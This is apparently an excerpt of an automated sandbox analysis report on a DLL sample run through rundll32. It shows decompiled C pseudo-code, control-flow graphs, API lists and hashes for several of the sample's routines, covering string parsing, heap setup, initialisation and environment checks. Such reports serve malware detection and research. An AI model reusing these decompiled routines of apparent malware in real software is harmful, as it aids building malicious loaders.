                                          • Instruction Fuzzy Hash: D8213975D00218FFEF119FA4DC44EBEBBB9EF49304F0080A5E610A6261CB719A15EF60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 06777C75, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 59COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 186 6777c75-6777c88 187 6777c8f-6777c93 StrChrA 186->187 188 6777c95-6777ca6 call 67758be 187->188 189 6777c8a-6777c8e 187->189 192 6777ceb 188->192 193 6777ca8-6777cb4 StrTrimA 188->193 189->187 195 6777ced-6777cf4 192->195 194 6777cb6-6777cbf StrChrA 193->194 196 6777cd1-6777cdd 194->196 197 6777cc1-6777ccb StrTrimA 194->197 196->194 198 6777cdf-6777ce9 196->198 197->196 198->195
                                          C-Code - Quality: 54%
                                          			E06777C75(char* __eax) {
				char* _t8;
				intOrPtr _t12;
				char* _t21;
				signed int _t23;
				char* _t24;
				signed int _t26;
				void* _t27;

				_t21 = __eax;
				_push(0x20);
				_t23 = 1;
				_push(__eax);
				while(1) {
					_t8 = StrChrA();
					if(_t8 == 0) {
						break;
					}
					_t23 = _t23 + 1;
					_push(0x20);
					_push( &(_t8[1]));
				}
				_t12 = E067758BE(_t23 << 2);
				 *((intOrPtr*)(_t27 + 0x10)) = _t12;
				if(_t12 != 0) {
					StrTrimA(_t21, 0x677c28c); // executed
					_t26 = 0;
					do {
						_t24 = StrChrA(_t21, 0x20);
						if(_t24 != 0) {
							 *_t24 = 0;
							_t24 =  &(_t24[1]);
							StrTrimA(_t24, 0x677c28c);
						}
						_t2 = _t27 + 0x10; // 0x4d283a53
						 *( *_t2 + _t26 * 4) = _t21;
						_t26 = _t26 + 1;
						_t21 = _t24;
					} while (_t24 != 0);
					_t6 = _t27 + 0x10; // 0x4d283a53
					 *((intOrPtr*)( *((intOrPtr*)(_t27 + 0x18)))) =  *_t6;
				}
				return 0;
			}










                                          0x06777c80
                                          0x06777c84
                                          0x06777c86
                                          0x06777c87
                                          0x06777c8f
                                          0x06777c8f
                                          0x06777c93
                                          0x00000000
                                          0x00000000
                                          0x06777c8a
                                          0x06777c8b
                                          0x06777c8e
                                          0x06777c8e
                                          0x06777c9b
                                          0x06777ca0
                                          0x06777ca6
                                          0x06777cae
                                          0x06777cb4
                                          0x06777cb6
                                          0x06777cbb
                                          0x06777cbf
                                          0x06777cc1
                                          0x06777cc4
                                          0x06777ccb
                                          0x06777ccb
                                          0x06777cd1
                                          0x06777cd5
                                          0x06777cd8
                                          0x06777cd9
                                          0x06777cdb
                                          0x06777ce3
                                          0x06777ce7
                                          0x06777ce7
                                          0x06777cf4

                                          APIs
                                          • StrChrA.SHLWAPI(?,00000020,00000000,06C495AC,?,?,?,06774C85,06C495AC,?,?,?,06774A8B,?,?,?), ref: 06777C8F
                                          • StrTrimA.KERNELBASE(?,0677C28C,00000002,?,?,?,06774C85,06C495AC,?,?,?,06774A8B,?,?,?,4D283A53), ref: 06777CAE
                                          • StrChrA.SHLWAPI(?,00000020,?,?,?,06774C85,06C495AC,?,?,?,06774A8B,?,?,?,4D283A53,?), ref: 06777CB9
                                          • StrTrimA.SHLWAPI(00000001,0677C28C,?,?,?,06774C85,06C495AC,?,?,?,06774A8B,?,?,?,4D283A53,?), ref: 06777CCB
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000012.00000002.346328294.0000000006771000.00000020.00020000.sdmp, Offset: 06770000, based on PE: true
                                          • Associated: 00000012.00000002.346318184.0000000006770000.00000004.00020000.sdmp Download File
                                          • Associated: 00000012.00000002.346339984.000000000677C000.00000002.00020000.sdmp Download File
                                          • Associated: 00000012.00000002.346346906.000000000677D000.00000004.00020000.sdmp Download File
                                          • Associated: 00000012.00000002.346355523.000000000677F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_18_2_6770000_rundll32.jbxd
                                          Similarity
                                          • API ID: Trim
                                          • String ID: S:(M
                                          • API String ID: 3043112668-2217774225
                                          • Opcode ID: 53d4f5e2fc9dfcfb00a5587835e748557746c499b47d300be3dcd1c68a2250e6
                                          • Instruction ID: dfe9b41c5ce955cd5094cb2472ebfa42d127d7352b4dc098c1ed423e7869c485
                                          • Opcode Fuzzy Hash: 53d4f5e2fc9dfcfb00a5587835e748557746c499b47d300be3dcd1c68a2250e6
                                          • Instruction Fuzzy Hash: 0801D4B1A053256FD6759F698C48F3BBFDCEF8AAA1F124628F941C7241DB60C80182F0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 067790A1, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 38sleepmemorythreadCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 199 67790a1-67790b7 HeapCreate 200 67790be-67790d4 GetTickCount call 6776a7f 199->200 201 67790b9-67790bc 199->201 202 677911c 200->202 205 67790d6-67790d7 200->205 201->202 206 67790d8-6779100 SwitchToThread call 6771c04 Sleep 205->206 209 6779102-677910b call 6779511 206->209 212 6779117 call 6774908 209->212 213 677910d 209->213 212->202 213->212
                                          C-Code - Quality: 100%
                                          			E067790A1(void* __edx, void* __edi, void* __esi, intOrPtr _a4) {
				void* _t5;
				void* _t7;
				void* _t10;
				void* _t13;
				void* _t14;
				void* _t15;
				void* _t16;
				signed int _t22;

				_t16 = __edx;
				_t5 = HeapCreate(0, 0x400000, 0); // executed
				 *0x677d238 = _t5;
				if(_t5 == 0) {
					_t14 = 8;
					return _t14;
				}
				 *0x677d1a8 = GetTickCount();
				_t7 = E06776A7F(_a4);
				if(_t7 == 0) {
					do {
						_t22 = SwitchToThread() + 8;
						_t10 = E06771C04(_a4, _t22);
						Sleep(0x20 + _t22 * 4); // executed
					} while (_t10 == 1);
					if(E06779511(_t15) != 0) {
						 *0x677d260 = 1; // executed
					}
					_t13 = E06774908(_t16); // executed
					return _t13;
				}
				return _t7;
			}











                                          0x067790a1
                                          0x067790aa
                                          0x067790b0
                                          0x067790b7
                                          0x067790bb
                                          0x00000000
                                          0x067790bb
                                          0x067790c8
                                          0x067790cd
                                          0x067790d4
                                          0x067790d8
                                          0x067790e4
                                          0x067790e8
                                          0x067790f7
                                          0x067790fd
                                          0x0677910b
                                          0x0677910d
                                          0x0677910d
                                          0x06779117
                                          0x00000000
                                          0x06779117
                                          0x0677911c

                                          APIs
                                          • HeapCreate.KERNEL32(00000000,00400000,00000000,06776F11,?), ref: 067790AA
                                          • GetTickCount.KERNEL32 ref: 067790BE
                                          • SwitchToThread.KERNEL32(?,00000001,?), ref: 067790D8
                                          • Sleep.KERNEL32(00000000,-00000008,?,00000001,?), ref: 067790F7
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000012.00000002.346328294.0000000006771000.00000020.00020000.sdmp, Offset: 06770000, based on PE: true
                                          • Associated: 00000012.00000002.346318184.0000000006770000.00000004.00020000.sdmp Download File
                                          • Associated: 00000012.00000002.346339984.000000000677C000.00000002.00020000.sdmp Download File
                                          • Associated: 00000012.00000002.346346906.000000000677D000.00000004.00020000.sdmp Download File
                                          • Associated: 00000012.00000002.346355523.000000000677F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_18_2_6770000_rundll32.jbxd
                                          Similarity
                                          • API ID: CountCreateHeapSleepSwitchThreadTick
                                          • String ID: <a
                                          • API String ID: 377297877-2910305453
                                          • Opcode ID: 123212b1e917326419ba90513de28870ffdf2ca8a6195947dbd23af462493c99
                                          • Instruction ID: 657458a534b4681a578b6c163b7432a6186c1264ce5b777d5d616aa9140e75a2
                                          • Opcode Fuzzy Hash: 123212b1e917326419ba90513de28870ffdf2ca8a6195947dbd23af462493c99
                                          • Instruction Fuzzy Hash: 25F0F071A61311AFDFA1ABB4AC0CB6A3AAAAF48355F008421EB04D7244EB30C401CAA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 06774908, Relevance: 7.7, APIs: 5, Instructions: 159memoryCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 215 6774908-6774922 call 67711af 218 6774924-6774932 215->218 219 6774938-6774946 215->219 218->219 221 6774958-6774973 call 6771111 219->221 222 6774948-677494b 219->222 228 6774975-677497b 221->228 229 677497d 221->229 222->221 223 677494d-6774952 222->223 223->221 225 6774adb 223->225 227 6774add-6774ae2 225->227 230 6774983-6774998 call 6771ec4 call 6771a4e 228->230 229->230 235 67749a3-67749a9 230->235 236 677499a-677499d CloseHandle 230->236 237 67749cf-67749e7 call 67758be 235->237 238 67749ab-67749b0 235->238 236->235 246 6774a13-6774a15 237->246 247 67749e9-6774a11 memset RtlInitializeCriticalSection 237->247 239 6774ac6-6774acb 238->239 240 67749b6 238->240 242 6774ad3-6774ad9 239->242 243 6774acd-6774ad1 239->243 244 67749b9-67749c8 call 6777827 240->244 242->227 243->227 243->242 253 67749ca 244->253 249 6774a16-6774a1a 246->249 247->249 249->239 252 6774a20-6774a36 RtlAllocateHeap 249->252 254 6774a66-6774a68 252->254 255 6774a38-6774a64 wsprintfA 252->255 253->239 256 6774a69-6774a6d 254->256 255->256 256->239 257 6774a6f-6774a8f call 67793d5 call 67798f7 256->257 257->239 262 6774a91-6774a98 call 677205b 257->262 265 6774a9f-6774aa6 262->265 266 6774a9a-6774a9d 262->266 267 6774abb-6774abf call 6779b6f 265->267 268 6774aa8-6774aaa 265->268 266->239 272 6774ac4 267->272 268->239 269 6774aac-6774ab0 call 6776cd3 268->269 273 6774ab5-6774ab9 269->273 272->239 273->239 273->267
                                          C-Code - Quality: 57%
                                          			E06774908(signed int __edx) {
				signed int _v8;
				long _v12;
				CHAR* _v16;
				long _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t21;
				CHAR* _t22;
				CHAR* _t25;
				intOrPtr _t26;
				void* _t27;
				void* _t31;
				void* _t32;
				CHAR* _t36;
				CHAR* _t42;
				CHAR* _t43;
				CHAR* _t44;
				CHAR* _t46;
				void* _t49;
				void* _t51;
				signed char _t56;
				intOrPtr _t58;
				signed int _t59;
				void* _t63;
				CHAR* _t67;
				CHAR* _t68;
				char* _t69;
				void* _t70;

				_t61 = __edx;
				_v20 = 0;
				_v8 = 0;
				_v12 = 0;
				_t21 = E067711AF();
				if(_t21 != 0) {
					_t59 =  *0x677d25c; // 0x4000000a
					_t55 = (_t59 & 0xf0000000) + _t21;
					 *0x677d25c = (_t59 & 0xf0000000) + _t21;
				}
				_t22 =  *0x677d164(0, 2);
				_v16 = _t22;
				if(_t22 == 0 || _t22 == 1 || _t22 == 0x80010106) {
					_t25 = E06771111( &_v8,  &_v20); // executed
					_t54 = _t25;
					_t26 =  *0x677d2a4; // 0x4ca5a8
					if( *0x677d25c > 5) {
						_t8 = _t26 + 0x677e5cd; // 0x4d283a53
						_t27 = _t8;
					} else {
						_t7 = _t26 + 0x677ea05; // 0x44283a44
						_t27 = _t7;
					}
					E06771EC4(_t27, _t27);
					_t31 = E06771A4E(_t61,  &_v20,  &_v12); // executed
					if(_t31 == 0) {
						CloseHandle(_v20);
					}
					_t63 = 5;
					if(_t54 != _t63) {
						 *0x677d270 =  *0x677d270 ^ 0x81bbe65d;
						_t32 = E067758BE(0x60);
						 *0x677d324 = _t32;
						__eflags = _t32;
						if(_t32 == 0) {
							_push(8);
							_pop(0);
						} else {
							memset(_t32, 0, 0x60);
							_t49 =  *0x677d324; // 0x6c495b0
							_t70 = _t70 + 0xc;
							__imp__(_t49 + 0x40);
							_t51 =  *0x677d324; // 0x6c495b0
							 *_t51 = 0x677e845;
						}
						_t54 = 0;
						__eflags = 0;
						if(0 == 0) {
							_t36 = RtlAllocateHeap( *0x677d238, 0, 0x43);
							 *0x677d2c4 = _t36;
							__eflags = _t36;
							if(_t36 == 0) {
								_push(8);
								_pop(0);
							} else {
								_t56 =  *0x677d25c; // 0x4000000a
								_t61 = _t56 & 0x000000ff;
								_t58 =  *0x677d2a4; // 0x4ca5a8
								_t13 = _t58 + 0x677e55a; // 0x697a6f4d
								_t55 = _t13;
								wsprintfA(_t36, _t13, _t56 & 0x000000ff, _t56 & 0x000000ff, 0x677c28f);
							}
							_t54 = 0;
							__eflags = 0;
							if(0 == 0) {
								asm("sbb eax, eax");
								E067793D5( ~_v8 &  *0x677d270, 0x677d00c); // executed
								_t42 = E067798F7(0, _t55, _t63, 0x677d00c); // executed
								_t54 = _t42;
								__eflags = _t54;
								if(_t54 != 0) {
									goto L30;
								}
								_t43 = E0677205B(_t55); // executed
								__eflags = _t43;
								if(_t43 != 0) {
									__eflags = _v8;
									_t67 = _v12;
									if(_v8 != 0) {
										L29:
										_t44 = E06779B6F(_t61, _t67, _v8); // executed
										_t54 = _t44;
										goto L30;
									}
									__eflags = _t67;
									if(__eflags == 0) {
										goto L30;
									}
									_t46 = E06776CD3(__eflags,  &(_t67[4])); // executed
									_t54 = _t46;
									__eflags = _t54;
									if(_t54 == 0) {
										goto L30;
									}
									goto L29;
								}
								_t54 = 8;
							}
						}
					} else {
						_t68 = _v12;
						if(_t68 == 0) {
							L30:
							if(_v16 == 0 || _v16 == 1) {
								 *0x677d160();
							}
							goto L34;
						}
						_t69 =  &(_t68[4]);
						do {
						} while (E06777827(_t63, _t69, 0, 1) == 0x4c7);
					}
					goto L30;
				} else {
					_t54 = _t22;
					L34:
					return _t54;
				}
			}
































                                          0x06774908
                                          0x06774912
                                          0x06774915
                                          0x06774918
                                          0x0677491b
                                          0x06774922
                                          0x06774924
                                          0x06774930
                                          0x06774932
                                          0x06774932
                                          0x0677493b
                                          0x06774941
                                          0x06774946
                                          0x06774960
                                          0x0677496c
                                          0x0677496e
                                          0x06774973
                                          0x0677497d
                                          0x0677497d
                                          0x06774975
                                          0x06774975
                                          0x06774975
                                          0x06774975
                                          0x06774984
                                          0x06774991
                                          0x06774998
                                          0x0677499d
                                          0x0677499d
                                          0x067749a6
                                          0x067749a9
                                          0x067749cf
                                          0x067749db
                                          0x067749e0
                                          0x067749e5
                                          0x067749e7
                                          0x06774a13
                                          0x06774a15
                                          0x067749e9
                                          0x067749ed
                                          0x067749f2
                                          0x067749f7
                                          0x067749fe
                                          0x06774a04
                                          0x06774a09
                                          0x06774a0f
                                          0x06774a16
                                          0x06774a18
                                          0x06774a1a
                                          0x06774a29
                                          0x06774a2f
                                          0x06774a34
                                          0x06774a36
                                          0x06774a66
                                          0x06774a68
                                          0x06774a38
                                          0x06774a38
                                          0x06774a3e
                                          0x06774a4b
                                          0x06774a51
                                          0x06774a51
                                          0x06774a59
                                          0x06774a62
                                          0x06774a69
                                          0x06774a6b
                                          0x06774a6d
                                          0x06774a74
                                          0x06774a81
                                          0x06774a86
                                          0x06774a8b
                                          0x06774a8d
                                          0x06774a8f
                                          0x00000000
                                          0x00000000
                                          0x06774a91
                                          0x06774a96
                                          0x06774a98
                                          0x06774a9f
                                          0x06774aa3
                                          0x06774aa6
                                          0x06774abb
                                          0x06774abf
                                          0x06774ac4
                                          0x00000000
                                          0x06774ac4
                                          0x06774aa8
                                          0x06774aaa
                                          0x00000000
                                          0x00000000
                                          0x06774ab0
                                          0x06774ab5
                                          0x06774ab7
                                          0x06774ab9
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x06774ab9
                                          0x06774a9c
                                          0x06774a9c
                                          0x06774a6d
                                          0x067749ab
                                          0x067749ab
                                          0x067749b0
                                          0x06774ac6
                                          0x06774acb
                                          0x06774ad3
                                          0x06774ad3
                                          0x00000000
                                          0x06774acb
                                          0x067749b6
                                          0x067749b9
                                          0x067749c3
                                          0x067749ca
                                          0x00000000
                                          0x06774adb
                                          0x06774adb
                                          0x06774ade
                                          0x06774ae2
                                          0x06774ae2

                                          APIs
                                            • Part of subcall function 067711AF: GetModuleHandleA.KERNEL32(4C44544E,00000000,06774920,00000001), ref: 067711BE
                                          • CloseHandle.KERNEL32(?,?,?,4D283A53,?,?), ref: 0677499D
                                            • Part of subcall function 067758BE: RtlAllocateHeap.NTDLL(00000000,-00000008,06771C51), ref: 067758CA
                                          • memset.NTDLL ref: 067749ED
                                          • RtlInitializeCriticalSection.NTDLL(06C49570), ref: 067749FE
                                            • Part of subcall function 06776CD3: memset.NTDLL ref: 06776CED
                                            • Part of subcall function 06776CD3: lstrlenW.KERNEL32(00000000,00410025,00000005,?,00000000), ref: 06776D24
                                            • Part of subcall function 06776CD3: StrCmpNIW.SHLWAPI(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,06774AB5), ref: 06776D2F
                                          • RtlAllocateHeap.NTDLL(00000000,00000043,00000060), ref: 06774A29
                                          • wsprintfA.USER32 ref: 06774A59
                                          Memory Dump Source
                                          • Source File: 00000012.00000002.346328294.0000000006771000.00000020.00020000.sdmp, Offset: 06770000, based on PE: true
                                          • Associated: 00000012.00000002.346318184.0000000006770000.00000004.00020000.sdmp Download File
                                          • Associated: 00000012.00000002.346339984.000000000677C000.00000002.00020000.sdmp Download File
                                          • Associated: 00000012.00000002.346346906.000000000677D000.00000004.00020000.sdmp Download File
                                          • Associated: 00000012.00000002.346355523.000000000677F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_18_2_6770000_rundll32.jbxd
                                          Similarity
                                          • API ID: AllocateHandleHeapmemset$CloseCriticalInitializeModuleSectionlstrlenwsprintf
                                          • String ID:
                                          • API String ID: 4246211962-0
                                          • Opcode ID: 2566f38af001d529a0f6279ba25500fcb7640582502d4f034ecc8a2b849ea248
                                          • Instruction ID: 1d83c846aa4067c3c1bd7d02b28bbaf2dc41de883d2fea22f43dda4e8e17743e
                                          • Opcode Fuzzy Hash: 2566f38af001d529a0f6279ba25500fcb7640582502d4f034ecc8a2b849ea248
                                          • Instruction Fuzzy Hash: E551BE71F10215AFEFF1EBA4DD88A6E77E9AF08700F068565E711E7288E6709901CB94
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 06776CD3, Relevance: 6.2, APIs: 3, Strings: 1, Instructions: 157stringCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          C-Code - Quality: 90%
                                          			E06776CD3(void* __eflags, WCHAR* _a4) {
				char _v40;
				char _v44;
				void _v48;
				int _v52;
				char _v56;
				char _v60;
				void* _v64;
				char _v68;
				intOrPtr _v72;
				int _v76;
				WCHAR* _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				char _v96;
				void* __ebx;
				void* __esi;
				intOrPtr _t40;
				int _t45;
				char _t50;
				intOrPtr _t52;
				void* _t55;
				intOrPtr _t67;
				void* _t70;
				void* _t81;
				WCHAR* _t90;

				_v52 = 0;
				memset( &_v48, 0, 0x2c);
				_v76 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t40 =  *0x677d2a4; // 0x4ca5a8
				_t5 = _t40 + 0x677ee24; // 0x410025
				_t90 = E06774814(_t5);
				_v84 = _t90;
				if(_t90 == 0) {
					_t81 = 8;
					L24:
					return _t81;
				}
				_t45 = StrCmpNIW(_t90, _a4, lstrlenW(_t90)); // executed
				if(_t45 != 0) {
					_t81 = 1;
					L22:
					E0677147E(_v88);
					goto L24;
				}
				if(E06779138(0,  &_v96) != 0) {
					_v96 = 0;
				}
				_t50 = E0677A5E9(0,  *0x677d33c);
				_v96 = _t50;
				if(_t50 == 0) {
					_t81 = 8;
					goto L19;
				} else {
					_t52 =  *0x677d2a4; // 0x4ca5a8
					_t11 = _t52 + 0x677e81a; // 0x65696c43
					_t55 = E0677A5E9(0, _t11);
					_t93 = _t55;
					if(_t55 == 0) {
						_t81 = 8;
					} else {
						_t81 = E067774B9(_v96, 0x80000001, _v92, _t93,  &_v60,  &_v56);
						E0677147E(_t93);
					}
					if(_t81 != 0) {
						L17:
						E0677147E(_v92);
						L19:
						_t92 = _v96;
						if(_v96 != 0) {
							E0677568A(_t92);
						}
						goto L22;
					} else {
						if(( *0x677d260 & 0x00000001) == 0) {
							L14:
							E06776E92(_t81, _v60, _v56,  *0x677d270, 0);
							_t81 = E06776737(_v72,  &_v64,  &_v60, 0);
							if(_t81 == 0) {
								_v68 = _v96;
								_v64 =  &_v60;
								_t81 = E067772F2( &_v84, 0);
							}
							E0677147E(_v60);
							goto L17;
						}
						_t67 =  *0x677d2a4; // 0x4ca5a8
						_t18 = _t67 + 0x677e823; // 0x65696c43
						_t70 = E0677A5E9(0, _t18);
						_t95 = _t70;
						if(_t70 == 0) {
							_t81 = 8;
						} else {
							_t22 =  &_v96; // 0x65696c43
							_t81 = E067774B9( *_t22, 0x80000001, _v92, _t95,  &_v44,  &_v40);
							E0677147E(_t95);
						}
						if(_t81 != 0) {
							goto L17;
						} else {
							goto L14;
						}
					}
				}
			}




























                                          0x06776ce9
                                          0x06776ced
                                          0x06776cf4
                                          0x06776cfc
                                          0x06776cfd
                                          0x06776cfe
                                          0x06776cff
                                          0x06776d00
                                          0x06776d01
                                          0x06776d09
                                          0x06776d15
                                          0x06776d17
                                          0x06776d1d
                                          0x06776e86
                                          0x06776e87
                                          0x06776e8f
                                          0x06776e8f
                                          0x06776d2f
                                          0x06776d37
                                          0x06776e78
                                          0x06776e79
                                          0x06776e7d
                                          0x00000000
                                          0x06776e7d
                                          0x06776d4a
                                          0x06776d4c
                                          0x06776d4c
                                          0x06776d58
                                          0x06776d5d
                                          0x06776d63
                                          0x06776e66
                                          0x00000000
                                          0x06776d69
                                          0x06776d69
                                          0x06776d6e
                                          0x06776d77
                                          0x06776d7c
                                          0x06776d85
                                          0x06776dac
                                          0x06776d87
                                          0x06776da1
                                          0x06776da3
                                          0x06776da3
                                          0x06776daf
                                          0x06776e59
                                          0x06776e5d
                                          0x06776e67
                                          0x06776e67
                                          0x06776e6d
                                          0x06776e6f
                                          0x06776e6f
                                          0x00000000
                                          0x06776db5
                                          0x06776dbc
                                          0x06776e01
                                          0x06776e14
                                          0x06776e2d
                                          0x06776e31
                                          0x06776e37
                                          0x06776e3f
                                          0x06776e4e
                                          0x06776e4e
                                          0x06776e54
                                          0x00000000
                                          0x06776e54
                                          0x06776dbe
                                          0x06776dc3
                                          0x06776dcc
                                          0x06776dd1
                                          0x06776dd5
                                          0x06776dfc
                                          0x06776dd7
                                          0x06776de7
                                          0x06776df1
                                          0x06776df3
                                          0x06776df3
                                          0x06776dff
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x06776dff
                                          0x06776daf

                                          APIs
                                          • memset.NTDLL ref: 06776CED
                                            • Part of subcall function 06774814: ExpandEnvironmentStringsW.KERNEL32(00000000,00000000,00000000,?,?,00000000,06776D15,00410025,00000005,?,00000000), ref: 06774825
                                            • Part of subcall function 06774814: ExpandEnvironmentStringsW.KERNEL32(?,00000000,00000000,00000000), ref: 06774842
                                          • lstrlenW.KERNEL32(00000000,00410025,00000005,?,00000000), ref: 06776D24
                                          • StrCmpNIW.SHLWAPI(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,06774AB5), ref: 06776D2F
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000012.00000002.346328294.0000000006771000.00000020.00020000.sdmp, Offset: 06770000, based on PE: true
                                          • Associated: 00000012.00000002.346318184.0000000006770000.00000004.00020000.sdmp Download File
                                          • Associated: 00000012.00000002.346339984.000000000677C000.00000002.00020000.sdmp Download File
                                          • Associated: 00000012.00000002.346346906.000000000677D000.00000004.00020000.sdmp Download File
                                          • Associated: 00000012.00000002.346355523.000000000677F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_18_2_6770000_rundll32.jbxd
                                          Similarity
                                          • API ID: EnvironmentExpandStrings$lstrlenmemset
                                          • String ID: Clie
                                          • API String ID: 3817122888-1624203186
                                          • Opcode ID: bd7b72e6c0ee4408ba762f770e1e009323671e66c17a1125e374f119c16a2f23
                                          • Instruction ID: a998bb9cf30d4fe77d2f06ea1b2bad3c5e9f38cfc1224e5bd2c6910d86cc5cd6
                                          • Opcode Fuzzy Hash: bd7b72e6c0ee4408ba762f770e1e009323671e66c17a1125e374f119c16a2f23
                                          • Instruction Fuzzy Hash: 3D41C072614745AFDF90EFA0DC84DABB7ECBF48614F00892ABA94D7114D671DC04CBA2
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0677A060, Relevance: 6.2, APIs: 4, Instructions: 154memoryCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 330 677a060-677a0a6 SysAllocString 331 677a0ac-677a0d9 330->331 332 677a1ca-677a1ce 330->332 338 677a0df-677a0e2 call 677a872 331->338 339 677a1c8 331->339 333 677a1d0-677a1d3 SafeArrayDestroy 332->333 334 677a1d9-677a1dd 332->334 333->334 335 677a1df-677a1e2 SysFreeString 334->335 336 677a1e8-677a1ee 334->336 335->336 341 677a0e7-677a0eb 338->341 339->332 341->339 342 677a0f1-677a101 341->342 342->339 344 677a107-677a12d 342->344 344->339 347 677a133-677a147 344->347 349 677a186-677a18b 347->349 350 677a149-677a14d 347->350 351 677a1bf-677a1c4 349->351 352 677a18d-677a192 349->352 350->349 353 677a14f-677a166 350->353 351->339 352->351 354 677a194-677a1a8 call 6771295 352->354 358 677a17d-677a180 SysFreeString 353->358 359 677a168-677a171 call 67791b5 353->359 354->351 360 677a1aa-677a1af 354->360 358->349 359->358 365 677a173-677a17b call 677a872 359->365 362 677a1b1-677a1b8 360->362 363 677a1ba 360->363 362->351 363->351 365->358
                                          APIs
                                          • SysAllocString.OLEAUT32(?), ref: 0677A09B
                                          • SysFreeString.OLEAUT32(00000000), ref: 0677A180
                                            • Part of subcall function 067791B5: SysAllocString.OLEAUT32(0677C298), ref: 06779205
                                          • SafeArrayDestroy.OLEAUT32(00000000), ref: 0677A1D3
                                          • SysFreeString.OLEAUT32(00000000), ref: 0677A1E2
                                            • Part of subcall function 0677A872: Sleep.KERNEL32(000001F4), ref: 0677A8BA
                                          Memory Dump Source
                                          • Source File: 00000012.00000002.346328294.0000000006771000.00000020.00020000.sdmp, Offset: 06770000, based on PE: true
                                          • Associated: 00000012.00000002.346318184.0000000006770000.00000004.00020000.sdmp Download File
                                          • Associated: 00000012.00000002.346339984.000000000677C000.00000002.00020000.sdmp Download File
                                          • Associated: 00000012.00000002.346346906.000000000677D000.00000004.00020000.sdmp Download File
                                          • Associated: 00000012.00000002.346355523.000000000677F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_18_2_6770000_rundll32.jbxd
                                          Similarity
                                          • API ID: String$AllocFree$ArrayDestroySafeSleep
                                          • String ID:
                                          • API String ID: 3193056040-0
                                          • Opcode ID: 63b4a0a655dfb2dcfbf4f39150266836202b55c899b57c10b1212ccd7327e8d5
                                          • Instruction ID: 8e30b683977f8d91295d3b47c7906773ade485549d94ef816774696d0c10613d
                                          • Opcode Fuzzy Hash: 63b4a0a655dfb2dcfbf4f39150266836202b55c899b57c10b1212ccd7327e8d5
                                          • Instruction Fuzzy Hash: F6513375900609AFEF41DFA8CC44AAEB7B6FF88750B148469E615DB210EB31ED45CB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 06774FFA, Relevance: 6.1, APIs: 4, Instructions: 104memoryCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 368 6774ffa-677503c 370 67750c3-67750c9 368->370 371 6775042-677504b 368->371 372 677504d-677505e SysAllocString 371->372 373 677508c-677508f 371->373 376 6775060-6775067 372->376 377 6775069-6775081 372->377 374 6775091-67750a1 SysAllocString 373->374 375 67750ed 373->375 378 67750a3 374->378 379 67750cc-67750eb 374->379 380 67750ef-67750f2 375->380 381 67750b5-67750b8 376->381 382 6775085-677508a 377->382 383 67750aa-67750ac 378->383 379->380 380->383 385 67750f4-6775101 380->385 381->370 384 67750ba-67750bd SysFreeString 381->384 382->373 382->381 383->381 386 67750ae-67750af SysFreeString 383->386 384->370 385->370 386->381
                                          APIs
                                          • SysAllocString.OLEAUT32(80000002), ref: 06775057
                                          • SysAllocString.OLEAUT32(0677A6F4), ref: 0677509B
                                          • SysFreeString.OLEAUT32(00000000), ref: 067750AF
                                          • SysFreeString.OLEAUT32(00000000), ref: 067750BD
                                          Memory Dump Source
                                          • Source File: 00000012.00000002.346328294.0000000006771000.00000020.00020000.sdmp, Offset: 06770000, based on PE: true
                                          • Associated: 00000012.00000002.346318184.0000000006770000.00000004.00020000.sdmp Download File
                                          • Associated: 00000012.00000002.346339984.000000000677C000.00000002.00020000.sdmp Download File
                                          • Associated: 00000012.00000002.346346906.000000000677D000.00000004.00020000.sdmp Download File
                                          • Associated: 00000012.00000002.346355523.000000000677F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_18_2_6770000_rundll32.jbxd
                                          Similarity
                                          • API ID: String$AllocFree
                                          • String ID:
                                          • API String ID: 344208780-0
                                          • Opcode ID: f602809d2bc77ee9465b6d96afa7808eef68f2192a7c9067042bf0be0014ff28
                                          • Instruction ID: e0429ca0650fc655bb77c9bc047c98a88d49ee6aec6a80a8096770e4f5471a24
                                          • Opcode Fuzzy Hash: f602809d2bc77ee9465b6d96afa7808eef68f2192a7c9067042bf0be0014ff28
                                          • Instruction Fuzzy Hash: C7310D71910209EFDF15DFA8D8C49AE7BB9FF48304B10846AEA05DB250EB759941CFA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 067768CF, Relevance: 4.6, APIs: 3, Instructions: 94memoryCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

